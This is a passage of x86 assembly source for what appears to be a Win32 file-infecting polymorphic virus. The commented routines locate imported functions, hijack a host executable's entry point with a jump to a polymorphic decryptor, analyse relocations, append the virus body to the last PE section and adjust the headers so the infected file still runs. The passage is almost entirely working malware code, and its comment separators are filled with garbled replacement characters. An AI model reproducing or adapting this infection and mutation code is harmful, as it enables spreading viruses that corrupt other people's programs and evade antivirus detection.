;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
find_by_name: ;
|
||
;Entry:
|
||
;
|
||
;edx - Delta offset for last section
|
||
;esi - Import Address Table for KERNEL32
|
||
;edi - Function name
|
||
;
|
||
;Exit:
|
||
;
|
||
;eax - RVA of function address (NULL if not found)
|
||
;
|
||
|
||
;Search for function name into IMAGE_IMPORT_BY_NAME
|
||
;structure pointed by every dword in the thunk data array
|
||
|
||
loop_by_name: ;Get address of IMAGE_IMPORT_BY_NAME structure
|
||
|
||
lodsd
|
||
or eax,eax
|
||
jz err_by_name
|
||
|
||
;Get pointer to function name
|
||
|
||
push esi
|
||
push edi
|
||
sub eax,edx
|
||
lea esi,dword ptr [eax+ebx+00000002h]
|
||
|
||
;Compare strings
|
||
|
||
name_by_name: lodsb
|
||
or al,al
|
||
jz ok_by_name
|
||
scasb
|
||
je name_by_name
|
||
|
||
;Go to next entry into Import Address Table
|
||
|
||
pop edi
|
||
pop esi
|
||
jmp loop_by_name
|
||
|
||
ok_by_name: pop edi
|
||
pop esi
|
||
lea eax,dword ptr [esi-00000004h]
|
||
sub eax,ebx
|
||
add eax,edx
|
||
err_by_name: ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Infection and mutation
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
infect_file: ;
|
||
;Entry:
|
||
;
|
||
;My_FindData - Win32 FindFile structure filled with data
|
||
; about file to infect
|
||
;eax - Base address of memory mapped image
|
||
;
|
||
;Exit:
|
||
;
|
||
;None
|
||
;
|
||
|
||
;Get last section header
|
||
|
||
mov ebx,eax
|
||
call get_last_sh
|
||
|
||
;ebx - Host base address
|
||
;esi - IMAGE_OPTIONAL_HEADER
|
||
;edi - Pointer to last section header
|
||
|
||
;This will help us later for calculating host base address
|
||
|
||
mov eax,dword ptr [ebp+my_FindData.WFD_nFileSizeLow]
|
||
add eax,dword ptr [edi+SH_VirtualAddress]
|
||
sub eax,dword ptr [edi+SH_PointerToRawData]
|
||
add eax,init_size
|
||
mov dword ptr [ebp+fix_baseaddr+mem_size],eax
|
||
|
||
;Copy original code at entry point into our buffer
|
||
|
||
mov edx,dword ptr [esi+OH_AddressOfEntryPoint]
|
||
mov dword ptr [ebp+rva_org_eip+mem_size],edx
|
||
call RVA2RAW
|
||
mov esi,ecx
|
||
lea edi,dword ptr [ebp+entry_code+mem_size]
|
||
mov ecx,BUFFER_EP
|
||
rep movsb
|
||
|
||
;Free memory mapped file
|
||
|
||
mov eax,ebx
|
||
call unmap_close
|
||
|
||
;Add virus size to file size and re-map it
|
||
|
||
mov eax,dword ptr [ebp+my_FindData.WFD_nFileSizeLow]
|
||
mov dword ptr [ebp+original_size],eax
|
||
add eax,inf_size
|
||
mov ecx,SIZE_PADDING
|
||
xor edx,edx
|
||
div ecx
|
||
inc eax
|
||
mul ecx
|
||
mov dword ptr [ebp+my_FindData.WFD_nFileSizeLow],eax
|
||
call open_map_file
|
||
or eax,eax
|
||
jnz done_re_open
|
||
stc
|
||
ret
|
||
|
||
done_re_open: ;ebx - host base address all along the following code
|
||
|
||
mov ebx,eax
|
||
|
||
;Initialize poly engine register table
|
||
;We are going to insert some garbage code at host
|
||
;entry-point, followed by a JMP to polymorphic
|
||
;decryptor
|
||
;This routine will also initialize random number
|
||
;generator
|
||
|
||
call init_poly
|
||
|
||
;Check for relocations over entry-point code
|
||
|
||
call get_last_sh
|
||
mov edx,dword ptr [esi+OH_DataDirectory. \
|
||
DE_BaseReloc. \
|
||
DD_VirtualAddress]
|
||
|
||
;Lovely file, no relocations, so we cant generate
|
||
;lots of polymorphic code at host entry-point
|
||
|
||
or edx,edx
|
||
jz lovely_file
|
||
|
||
call RVA2RAW
|
||
mov edi,esi
|
||
mov esi,ecx
|
||
|
||
;ebx - Host base address
|
||
;ecx - Pointer to RAW data or NULL if error
|
||
;edx - Section delta offset
|
||
;esi - Pointer to section RAWDATA
|
||
;edi - Pointer to IMAGE_OPTIONAL_HEADER
|
||
|
||
;Check relocations over host entry-point code
|
||
|
||
call do_reloc_work
|
||
|
||
;We have space for inserting some garbage code?
|
||
|
||
cmp eax,00000005h
|
||
jb fuxoring_file
|
||
|
||
;Another lovely file, eh?
|
||
|
||
cmp eax,BUFFER_EP
|
||
jb ugly_file
|
||
|
||
lovely_file: ;We reach this code for 3 posible reasons:
|
||
;
|
||
; 1) When the target file have no relocations or...
|
||
; 2) All the relocations are behind the entry-point or...
|
||
; 3) We have lots space from entry-point to 1st reloc
|
||
|
||
;Save number of bytes to restore at host entry-point
|
||
|
||
mov dword ptr [ebp+insert_size+mem_size],BUFFER_EP
|
||
|
||
;Get RAW of entry-point
|
||
|
||
call get_last_sh
|
||
mov edx,dword ptr [esi+OH_AddressOfEntryPoint]
|
||
call RVA2RAW
|
||
mov edi,ecx
|
||
|
||
;Generate a piece of polymorphic code at host entry-point
|
||
|
||
push ebx
|
||
push edi
|
||
call gen_garbage
|
||
pop eax
|
||
sub eax,edi
|
||
pop ebx
|
||
|
||
;Insert a jump to virus code at entry point
|
||
|
||
jmp short insert_jump
|
||
|
||
ugly_file: ;There are no relocations over first five bytes of
|
||
;code at host entry-point
|
||
;So we can insert a JUMP to virus polymorphic decryptor
|
||
|
||
;Save size of code to generate
|
||
|
||
mov dword ptr [ebp+insert_size+mem_size],00000005h
|
||
|
||
;Where to place the JUMP
|
||
|
||
mov edx,dword ptr [edi+OH_AddressOfEntryPoint]
|
||
call RVA2RAW
|
||
mov edi,ecx
|
||
xor eax,eax
|
||
|
||
;Insert a jump to virus code at entry point
|
||
|
||
insert_jump: push eax
|
||
mov al,0E9h
|
||
stosb
|
||
push edi
|
||
call get_last_sh
|
||
mov eax,dword ptr [ebp+original_size]
|
||
add eax,poly_decryptor-Mem_Base
|
||
sub eax,dword ptr [edi+SH_PointerToRawData]
|
||
add eax,dword ptr [edi+SH_VirtualAddress]
|
||
sub eax,dword ptr [esi+OH_AddressOfEntryPoint]
|
||
sub eax,00000005h
|
||
pop edi
|
||
pop edx
|
||
add eax,edx
|
||
stosd
|
||
|
||
;Execution continues on next routine
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Attach virus to file
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
back2infection: ;We fall here after the entry-point stuff
|
||
;Complete infection and do polymorphic encryption
|
||
|
||
;Save current system time inside virus body
|
||
|
||
lea eax,dword ptr [ebp+inf_time+mem_size]
|
||
push eax
|
||
call dword ptr [ebp+a_GetSysTime]
|
||
|
||
;Generate polymorphic encryption
|
||
|
||
push ebx
|
||
call mutate
|
||
pop ebx
|
||
|
||
;Get pointer to last section
|
||
|
||
call get_last_sh
|
||
|
||
;ebx - Host base address
|
||
;esi - IMAGE_OPTIONAL_HEADER
|
||
;edi - Pointer to last section header
|
||
|
||
;Get new SizeOfRawData and VirtualSize
|
||
|
||
mov eax,dword ptr [ebp+my_FindData.WFD_nFileSizeLow]
|
||
add eax,mem_size-inf_size
|
||
sub eax,dword ptr [edi+SH_PointerToRawData]
|
||
mov edx,eax
|
||
cmp eax,dword ptr [edi+SH_VirtualSize]
|
||
jbe ok_VirtualSize
|
||
mov dword ptr [edi+SH_VirtualSize],eax
|
||
ok_VirtualSize: mov eax,edx
|
||
xor edx,edx
|
||
mov ecx,dword ptr [esi+OH_FileAlignment]
|
||
div ecx
|
||
inc eax
|
||
mul ecx
|
||
mov dword ptr [edi+SH_SizeOfRawData],eax
|
||
|
||
;Set section characteristics
|
||
|
||
or dword ptr [edi+SH_Characteristics], \
|
||
IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
|
||
|
||
;Update OH_SizeOfImage
|
||
|
||
mov eax,dword ptr [ebp+my_FindData.WFD_nFileSizeLow]
|
||
mov edx,dword ptr [esi+OH_SizeOfImage]
|
||
cmp eax,edx
|
||
jae done_image_s
|
||
lea eax,dword ptr [edx+mem_size]
|
||
done_image_s: xor edx,edx
|
||
mov ecx,dword ptr [esi+OH_SectionAlignment]
|
||
div ecx
|
||
inc eax
|
||
mul ecx
|
||
mov dword ptr [esi+OH_SizeOfImage],eax
|
||
|
||
;Write virus into memory mapped file
|
||
|
||
mov ecx,inf_size
|
||
lea esi,dword ptr [ebp+Mem_Base+mem_size]
|
||
mov edi,ebx
|
||
add edi,dword ptr [ebp+original_size]
|
||
rep movsb
|
||
|
||
;Free memory mapped file
|
||
|
||
mov eax,ebx
|
||
call unmap_close
|
||
|
||
;Exit, file is infected
|
||
|
||
clc
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Get RAW of entry
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Change the entry-point field in file header
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
fuxoring_file: ;Well, after checking relocations for this file we
|
||
;found that there is a relocation over the first
|
||
;five bytes of host entry-point code
|
||
|
||
;Our buffer is ZERO bytes coz no code needs to be
|
||
;restored on host execution
|
||
|
||
xor eax,eax
|
||
mov dword ptr [ebp+insert_size+mem_size],eax
|
||
|
||
;Get the RVA for virus entry-point
|
||
|
||
call get_last_sh
|
||
mov eax,dword ptr [ebp+original_size]
|
||
add eax,poly_decryptor-Mem_Base
|
||
add eax,dword ptr [edi+SH_VirtualAddress]
|
||
sub eax,dword ptr [edi+SH_PointerToRawData]
|
||
|
||
;Overwrite OH_AddressOfEntryPoint with the
|
||
;virus entry point
|
||
|
||
mov dword ptr [esi+OH_AddressOfEntryPoint],eax
|
||
jmp back2infection
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Get pointer to last section header
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
get_last_sh: ;
|
||
;Entry:
|
||
;
|
||
;ebx - Host base address
|
||
;
|
||
;Exit:
|
||
;
|
||
;esi - IMAGE_OPTIONAL_HEADER
|
||
;edi - Pointer to last section header
|
||
;
|
||
|
||
mov esi,dword ptr [ebx+DH_lfanew]
|
||
add esi,ebx
|
||
cld
|
||
lodsd
|
||
movzx ecx,word ptr [esi+FH_NumberOfSections]
|
||
dec ecx
|
||
mov eax,IMAGE_SIZEOF_SECTION_HEADER
|
||
mul ecx
|
||
movzx edx,word ptr [esi+FH_SizeOfOptionalHeader]
|
||
add esi,IMAGE_SIZEOF_FILE_HEADER
|
||
add eax,edx
|
||
add eax,esi
|
||
mov edi,eax
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Convert RVA to RAW
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
RVA2RAW: ;
|
||
;Entry:
|
||
;
|
||
;ebx - Host base address
|
||
;edx - RVA to convert
|
||
;
|
||
;Exit:
|
||
;
|
||
;ecx - Pointer to RAW data or NULL if error
|
||
;edx - Section delta offset
|
||
;esi - Pointer to IMAGE_OPTIONAL_HEADER
|
||
;edi - Pointer to section header
|
||
;
|
||
|
||
cld
|
||
mov dword ptr [ebp+search_raw],edx
|
||
mov esi,dword ptr [ebx+DH_lfanew]
|
||
add esi,ebx
|
||
lodsd
|
||
movzx ecx,word ptr [esi+FH_NumberOfSections]
|
||
jecxz err_RVA2RAW
|
||
movzx edi,word ptr [esi+FH_SizeOfOptionalHeader]
|
||
add esi,IMAGE_SIZEOF_FILE_HEADER
|
||
add edi,esi
|
||
|
||
;Get the IMAGE_SECTION_HEADER that contains RVA
|
||
;
|
||
;At this point:
|
||
;
|
||
;ebx - File base address
|
||
;esi - Pointer to IMAGE_OPTIONAL_HEADER
|
||
;edi - Pointer to first section header
|
||
;ecx - Number of sections
|
||
|
||
s_img_section:
|
||
;Check if address of imports directory is inside this
|
||
;section
|
||
|
||
mov eax,dword ptr [ebp+search_raw]
|
||
mov edx,dword ptr [edi+SH_VirtualAddress]
|
||
sub eax,edx
|
||
cmp eax,dword ptr [edi+SH_VirtualSize]
|
||
jb section_ok
|
||
|
||
out_of_section: ;Go to next section header
|
||
|
||
add edi,IMAGE_SIZEOF_SECTION_HEADER
|
||
loop s_img_section
|
||
err_RVA2RAW: ret
|
||
|
||
section_ok: ;Get raw
|
||
|
||
mov ecx,dword ptr [edi+SH_PointerToRawData]
|
||
sub edx,ecx
|
||
add ecx,eax
|
||
add ecx,ebx
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Do needed relocation corrections over code at host entry-point
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
do_reloc_work: ;Entry:
|
||
;
|
||
;ebx - host base address
|
||
;esi - IMAGE_BASE_RELOCATION
|
||
;edi - IMAGE_OPTIONAL_HEADER
|
||
;
|
||
;Exit:
|
||
;
|
||
;ecx - Space free of relocations at entry-point
|
||
;
|
||
|
||
;Get IBR_VirtualAddress
|
||
|
||
cld
|
||
lodsd
|
||
mov edx,eax
|
||
|
||
;Get IBR_SizeOfBlock
|
||
|
||
lodsd
|
||
or eax,eax
|
||
jnz continue_reloc
|
||
|
||
;We have reached the last relocation and all of them
|
||
;seem to refer to virtual addresses behind the host
|
||
;entry-point, so we can generate lots of polymorphic
|
||
;code there
|
||
|
||
xor ecx,ecx
|
||
not ecx
|
||
ret
|
||
|
||
continue_reloc: ;Get number of relocations in this block
|
||
|
||
sub eax,IMAGE_SIZEOF_BASE_RELOCATION
|
||
shr eax,01h
|
||
mov ecx,eax
|
||
|
||
rblock_loop: ;Get IBR_TypeOffset
|
||
|
||
push ecx
|
||
xor eax,eax
|
||
lodsw
|
||
and ax,0FFFh
|
||
add eax,edx
|
||
cmp eax,dword ptr [edi+OH_AddressOfEntryPoint]
|
||
jae reloc_over_ep
|
||
|
||
next_reloc: ;Follow relocations chain
|
||
|
||
pop ecx
|
||
loop rblock_loop
|
||
jmp short do_reloc_work
|
||
|
||
reloc_over_ep: ;Get number of bytes from entry-point to first relocation
|
||
|
||
pop ecx
|
||
sub eax,dword ptr [edi+OH_AddressOfEntryPoint]
|
||
ret
|
||
|
||
